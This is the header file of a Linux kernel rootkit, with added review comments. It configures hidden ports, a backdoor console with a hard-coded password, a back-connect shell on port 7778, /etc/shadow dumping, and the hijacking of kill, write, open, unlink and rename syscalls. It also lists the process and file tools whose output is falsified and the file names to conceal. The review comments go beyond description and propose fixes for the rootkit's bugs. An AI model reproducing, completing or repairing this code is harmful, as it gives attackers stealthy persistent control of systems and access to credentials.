/*
* cr0security's rootkit header file
* (c) Copyright by Cr0security All Rights Reserved
* http://www.cr0security.com
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
*
*/
#ifndef _cr0security_H_
#define _cr0security_H_
/*
 * Build-time configuration and shared globals for the cr0security LKM.
 * Every variable below is a plain definition, not an `extern` declaration,
 * so this header can be included by exactly one translation unit; a second
 * include produces duplicate definitions.
 *
 * NOTE(review): `_cr0security_H_` starts with an underscore at file scope and
 * is therefore a reserved identifier in C; a guard such as CR0SECURITY_H
 * would be safer.
 */
/* Defined as an empty token.  It is used further down (the `resumer`
 * prototype) purely as a marker that expands to nothing. */
#define cr0security
/*cr_PID will be replaced by configure_lkm.pl , prevent opening /proc/ourpid */
#define cr_PID 16000
#define our_dmesg_path "/var/log/dmesg"
/* Name fragments used to recognise the module's own artefacts. */
#define cr_PROC "cr0security"
#define cr_cocoa "cr0sec"
#define cr_panda "cr0"
/* NOTE(review): absolute path from the author's workstation baked into the
 * build; it will not exist on any other machine. */
#define GETOPT_LACK_VALIDATION_PATH "/home/ev1lut10n/Desktop/cr0security_lkm/"
/* Each port is kept both as decimal text and as hex text
 * (7777 = 0x1E61, 7778 = 0x1E62, 3737 = 0xE99).  The hex form presumably
 * matches the ports-in-hex layout of /proc/net/tcp (PROC_NET_TCP below) --
 * confirm against the hook that uses it.  Note that cr_kern_PORT_HEX is
 * lower-case and has no leading zero, unlike the two other *_HEX strings;
 * if these are compared textually, that entry behaves differently. */
#define cr_PORT "7777"
#define cr_PORT_HEX "1E61"
#define cr_backconnect_PORT "7778"
#define cr_backconnect_PORT_HEX "1E62"
#define int_cr_kern_port 3737
#define cr_kern_PORT_HEX "e99"
#define string_cr_kern_port "3737"
/* KERN saves the current address limit in the global `old_fs` (declared
 * below) and widens it to KERNEL_DS; END restores it.  Neither is wrapped in
 * do { } while (0), so `if (x) KERN; else ...` will not compile.
 * NOTE(review): set_fs()/KERNEL_DS were removed from mainline Linux in 5.10;
 * this pattern only builds against older kernels. */
#define END {set_fs(old_fs);}
#define KERN {old_fs=get_fs(); set_fs(KERNEL_DS);}
#define TRUE 1
#define FALSE 0
#define PROC_NET_TCP "/proc/net/tcp"
/* Presumably the login prompt; the expected secret itself is the `password`
 * array defined below. */
#define the_pass "password:"
/* NOTE(review): second hard-coded developer-machine path. */
#define myprocessor "/home/ev1lut10n/Desktop/cr0security_lkm/cr0securityd"
/* Hard-coded sys_call_table address, patched by configure_lkm.pl at build
 * time.  NOTE(review): the original comment named 0xc05d2180, but the literal
 * below is 0xc0595180; the value here is only a placeholder for one specific
 * kernel image and is wrong for every other one. */
unsigned long *proto_sys_call = (unsigned long *) 0xc0595180;
/* Sentinel pointer value; never a valid address. */
unsigned long *invalid = (unsigned long *) 0xdeadbeef;
typedef int boolean;
/* NOTE(review): the cr_send()/cr_recvmsg() prototypes below reuse `Length`
 * and `Length3` as parameter names, which shadow these globals inside those
 * functions. */
size_t Length,Length2,Length3,Length4,Length5,Length6;
const char __user *buf_modified;
/* Hard-coded console credential (same text as cr_cocoa).  Six characters in
 * a six-byte array leave NO terminating NUL: strcmp()/strlen() on `password`
 * read past the end of the object.  Either declare it `password[]` (7 bytes)
 * or compare with memcmp() and an explicit length. */
const char password[6] = "cr0sec";
/* "\0x00" is the octal escape \0 followed by the three characters 'x','0','0'
 * -- four bytes plus a terminator, which is why it fits in [5].  The intent
 * was probably "\x00"; verify before relying on its contents. */
const char null_terminate[5] = "\0x00";
char *mypassword;
char *tricky;
struct socket;
struct sockaddr;
struct sockaddr_in;
typedef int cr0;
/* Pointer typedef: `cr0sock` is `struct socket *` (the indirection is hidden). */
typedef struct socket *cr0sock;
cr0sock server_sock,master_sock,mys0ck;
/* `panjang` is Indonesian for "length". */
static cr0 result,panjang,total_pass,char_array;
static char cr0_buffer[980];
char *sockbuffer;
char *sockbuffer_cmd;
char *sockbuffer_menu_rootkit;
char *cmd_buffer;
char *clean_buffer;
char *envp[3];
char *two_last;
long r1m,r4m;
/* Saved address limit used by the KERN/END macros above. */
mm_segment_t old_fs;
/* Exactly 16 initialisers fill the array, so it is NOT NUL-terminated; it can
 * only be scanned by index, never passed to string functions. */
static char valid_char[16] = {'b','c','s','e','x','i','t','h','d','w','o','p','r','1','a','l'};
static char  *log_path = "/bin/dat";
//static struct task_struct *tcpd_thread;
/* Banner presumably sent to a connected console client; it lists the
 * accepted commands and ends with the first "console > " prompt. */
char* cr_motd = "\n========================================="
                                        "\nWelcome to Cr0security TCPD Console"
                                        "\n=========================================="
                                        "\navailable commands:\n"
                                        "bcs - shd - who - psa - prt - help - exit\n"
                                        "description:"
                                        "\nbcs - back connect to your current ip via port 7778 (setup netcat to listen on 7778)"
                                        "\nshd - seed command : view /etc/shadow"
                                        "\npsa - seed command : ps aux | tail"
                                        "\nwho - seed command : show who is logged on"
                                        "\nprt - print your command's result"
                                        "\nhelp - print this help"
                                        "\nexit - exit this console"
                                        "\nconsole > ";
char* cr_console = "\nconsole > ";
char* cr_failed_epic = "\nWrong password ! Access Denied\n";
/* `cr0security` is the empty macro defined at the top of this header, so this
 * line reads `static inline cr0 resumer(...)` after preprocessing. */
static inline cr0 cr0security resumer(cr0sock master_sock,struct sockaddr_in master_addr);
/*
static char* cr0_substring(const char str[6],cr0 len_original_string,cr0 length_from_last);
*/
/* Console daemon entry point operating on master_sock; returns an int status
 * whose meaning is not visible from this header. */
static int crdaemon(cr0sock master_sock,struct sockaddr_in master_addr);
/* Works on a kernel-side copy (`kern_heap`) of a user buffer (`buf`);
 * `ev1lmode` selects a mode defined by the implementation, not here. */
static inline char *crrepinval(char *kern_heap,const char __user *buf,cr0 ev1lmode);
/* Sends `Length` bytes of `Buffer` on `sock`.  The parameter `Length` shadows
 * the global of the same name. */
static inline size_t cr_send(struct socket *sock, const char *Buffer, size_t Length);
/* Receives up to `Length3` bytes into `cr0_buffer`; both parameters shadow
 * the globals of the same names. */
static inline ssize_t cr_recvmsg(cr0sock master_sock, void *cr0_buffer, size_t Length3);
char *log_path_buf3;
struct file *ev1l_proc,*ev1l_proc_net_tcp;
char *incoming_data;
char *successfull_msg = "Command has been executed successfully, to print the result type 'prt'\n";
char *failure = "Failed to execute your command !\n";
/* `hasil_konversi` is Indonesian for "conversion result". */
char hasil_konversi[10];
char predict_buffer[70];
char got_real_bufer[71];
/* NOTE(review): `__cr0_accept` and `____cr0_accept` begin with a double
 * underscore and are reserved identifiers.  `konter` ("counter") is declared
 * a second time a few lines down; both are tentative definitions, which C
 * tolerates within a single translation unit.  Globals named `bind` and
 * `listen` would collide with the libc socket functions in user space; they
 * are only viable because this is kernel code. */
cr0 status,konter,bit_mesin,nilai_kembali, bind, listen,cr0_data_size,__cr0_accept,____cr0_accept,ev1lmode,gmon_ops_return,i,j,executed,log_path_length;
char *tmp, *kern_heap, *kern_heap2;
/* `pointer_berupa_integer` = "pointer as integer". */
cr0 *pointer_berupa_integer;
u_char *tmpbuf;
/* Initialised to 1 (TRUE); the hook that reads it is not in this header. */
cr0 should_i_disable_sys_kill = 1;
cr0 sockbuf2_length,sockbuf1_length;
boolean found, cr0_stat, end_of_proc_net_tcp, already,validchar;
char *cr0_heap,*cr0_argumen,*str2;
/* Second tentative definition of `konter` (see above). */
cr0 how_much, len2, panjang_fake_net, panjang_fake_net_hex, panjang_dmesg_buffer, konter, rename_konter, konter2=0, totheap=0;
static cr0 dmesg_size = 256;
struct file *ev1l_dmesg,*raidon;
/* `k_m_a_l_l_o_c__b_u_f_f_e_r` is declared here and again two lines down
 * (duplicate tentative definition). */
void *dmesg_buffer,*kmalloc_buffer,*k_m_a_l_l_o_c__b_u_f_f_e_r,*vmalloc_buffer,*unknown_buffer;
char *rkmalloc_buffer;
void *k_m_a_l_l_o_c__b_u_f_f_e_r;
boolean do_fake,do_fake_hex,rename_found;
unsigned long *retback_val;
char *file_buf,*lemme_lemme_maho,*rename_oldname;
static char *fake_net,*fake_net_hex;
/*msghdr for sock_rcvmsg and sock_sendmsg*/
typedef struct msghdr h4x0rmsg;
struct iovec iov;
/*ksocket header taken from ksocket made by @[email protected]*/
/* Same underlying type as `cr0sock` above (`struct socket *`). */
typedef struct socket *ksocket_t;
/* NOTE(review): these two are declared `inline` without `static`, unlike
 * every other prototype in this header; `inet_ntoa` also reuses a libc
 * name.  The `in_addr`/`sockaddr` types must be complete where these are
 * defined. */
inline char *inet_ntoa(struct in_addr *in);
inline ksocket_t kaccept(ksocket_t socket, struct sockaddr *address, cr0 *address_len);
/*eof ksocket*/
boolean letmein;
size_t orig_len;
char *master_ip;
char *tmpbufx;
char *tmpcharbuf;
char *pointer;
/* String helpers; ownership of the returned buffers is not stated here --
 * check the definitions before assuming the caller must free them. */
static inline char* crtruncate(const char* str,cr0 len);
static inline char* replace_string(char *full_str,char *old_str, char *new_str);
/* `nomer` = "number" (Indonesian). */
static inline char *crinst(cr0 nomer);
static inline char *crflp_open(char *thecmd);
inline unsigned long *cr0repop(void *cr0_argumen);
/* Eleven command names; the longest, "pstree", is six characters, so every
 * row keeps its terminating NUL within [7]. */
static char cmd_pawned_cmd[11][7] = {{"pgrep"},{"ps"},{"pstree"},{"pmap"},{"grep"},{"lsof"},{"top"},{"ls"},{"dir"},{"kstat"},{"stat"}};
/* NOTE(review): "sys_unlinkat" is exactly 12 characters, so that row has NO
 * terminating NUL; any string function applied to it runs on into the
 * "sys_open" row.  Widening the inner dimension to 13 fixes it.  Also note
 * chdir/rmdir have original-pointer slots below but are absent from this
 * list. */
static char hijacked_syscall[6][12] = {{"sys_kill"},{"sys_write"},{"sys_unlink"},{"sys_unlinkat"},{"sys_open"},{"sys_rename"}};
/* NOTE(review): "configure_lkm.pl" is exactly 16 characters, so that row is
 * likewise unterminated and reads on into "install.pl"; a substring match
 * against it cannot succeed as written.  Widen to [7][17]. */
static char forbidden_files_to_read[7][16] = {{"cr0security"},{"linux_"},{"exploit"},{"Makefile"},{"configure_lkm.pl"},{"install.pl"},{"/dev/kmem"}};
/*
 * Slots for the original syscall handlers (`asli` is Indonesian for
 * "original"), presumably saved before the table entries are replaced so the
 * hooks can fall through to them.  NOTE(review): the signatures are
 * hand-written rather than taken from a kernel header, so a mismatch with the
 * target kernel (e.g. `mode` being `umode_t`, or `pid`/`sig` being `pid_t`
 * and `int`) would not be caught by the compiler.
 */
asmlinkage long (*chdir_asli)(const char __user *filename);
asmlinkage long (*rmdir_asli)(const char __user *pathname);
asmlinkage long  (*rename_asli)(const char __user *oldname,const char __user *newname);
asmlinkage long (*kill_asli)(cr0 pid, cr0 sig);
asmlinkage long (*write_asli)(unsigned int fd, const char __user *buf,size_t count);
asmlinkage long (*open_asli)(const char __user *filename,cr0 flags, cr0 mode);
asmlinkage long (*unlink_asli)(const char __user *pathname);
/* The unlinkat slot is only declared for kernels >= 2.6.18 per this guard. */
#if (LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,18))
asmlinkage long (*unlinkat_asli)(cr0 dfd, const char __user * pathname, cr0 flag);
#endif
#endif /*#ifndef _cr0security_H_*/